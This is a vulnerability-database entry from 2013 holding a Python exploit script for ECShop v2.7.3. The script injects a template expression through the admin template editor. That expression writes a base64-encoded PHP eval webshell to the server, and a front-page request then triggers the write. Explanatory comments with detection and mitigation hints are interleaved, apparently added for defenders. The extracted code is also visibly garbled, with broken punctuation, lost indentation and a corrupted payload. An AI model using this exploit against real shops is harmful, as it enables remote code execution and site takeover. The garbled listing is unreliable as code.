ECShop v2.7.3 RELEASE 20121106 EXP - vulnerability warning - the black bar safety net

2013-06-19T00:00:00
ID MYHACK58:62201339307
Type myhack58
Reporter MXi4oyu
Modified 2013-06-19T00:00:00

Description

# -*- coding:gbk -*-

import httplib2

from urllib import urlencode

# PostData: sends a single form-encoded POST to the ECShop admin template
# editor and prints the response items and body. The listing is reproduced as
# extracted: indentation and some punctuation were lost on this page.
#
# Defender summary (from the visible request only):
#   - endpoint: the admin script template.php with act=update_library
#   - form fields: lib (a library template name) and html (the new template body)
#   - the html value is a template "{if ...}" expression that calls
#     fputs(fopen(...)) with two base64_decode() arguments, i.e. it is meant to
#     make the template engine write a file on the server.
# Detection: look in web logs / WAF for POSTs to admin/template.php with
# act=update_library whose html field contains fputs, fopen or base64_decode,
# and for library templates or .php files that changed or appeared unexpectedly.
# Mitigation: restrict access to /admin/, keep template files non-writable by
# the web server where possible, and apply the vendor's fix for this release.
def PostData(url):

# Appends the admin template-update action to the base URL passed in.
url=url+'/admin/template. php? act=update_library'

# The next line was a source comment; its comment marker was lost in extraction.
Defined to submit the data

# Template body submitted in the html field. The first base64 string is the
# name of the file to create and the second is its content; the second begins
# with the encoding of "<?php" and appears to be an eval-of-POST-parameter stub
# (its tail is garbled on this page).
html='{if fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2Z1Y2tdktsgpz5mdwnr))}1 6 0 8 6{/if}'

# lib names the library template the request targets -- presumably the one
# whose stored content is replaced by html; confirm against template.php.
data=dict(lib='recommend_best',html=html)

# httplib2 client using an on-disk cache directory.
h = httplib2. Http('. cache')

# Only a Content-Type header is set; the script sends no session cookie or
# credentials. NOTE(review): whether the endpoint accepts the request without
# an authenticated admin session is not shown on this page.
response,content = h. request(url, 'POST', urlencode(data),

headers={'Content-Type': 'application/x-www-form-urlencoded'})

# Dump every item of the response object, then the body decoded as UTF-8.
for item in response. items(): print(item)

print(content. decode('utf-8'))

# getHttp: issues a plain GET to the shop front page action cat_rec and prints
# the response items and body. It is called right after PostData in the main
# block -- presumably so that the shop renders the modified library template
# and the injected "{if ...}" expression is evaluated; the page does not state
# this explicitly.
# Detection: a POST to admin/template.php (act=update_library) followed shortly
# by a GET to index.php?act=cat_rec from the same client is the request pair
# this script produces.
def getHttp(urlstr):

# Appends the front-end action to the base URL passed in.
urlstr=urlstr+'/index. php? act=cat_rec'

# Separate httplib2 client, same on-disk cache directory name as PostData.
hlib=httplib2. Http('. cache')

# No method argument is given, so this is httplib2's default request (GET).
response,content=hlib. request(urlstr)

print("\n server response:\n")

# Python 2 print statement: the script targets Python 2 (see also the
# "from urllib import urlencode" import at the top of the listing).
for r in response. items():

print r

print("\n output:\n")

# Body is decoded as UTF-8 for display.
print(content. decode("utf-8"))

# Script entry point as extracted (formatting and punctuation were lost on this
# page). It runs the two requests in order against one hard-coded base URL:
# first the template-update POST, then the front-page GET.
# The host below is the one printed on the page; presumably a placeholder.
if name=='main':

PostData('http://www.dome.com/')

getHttp('http://www.dome.com/')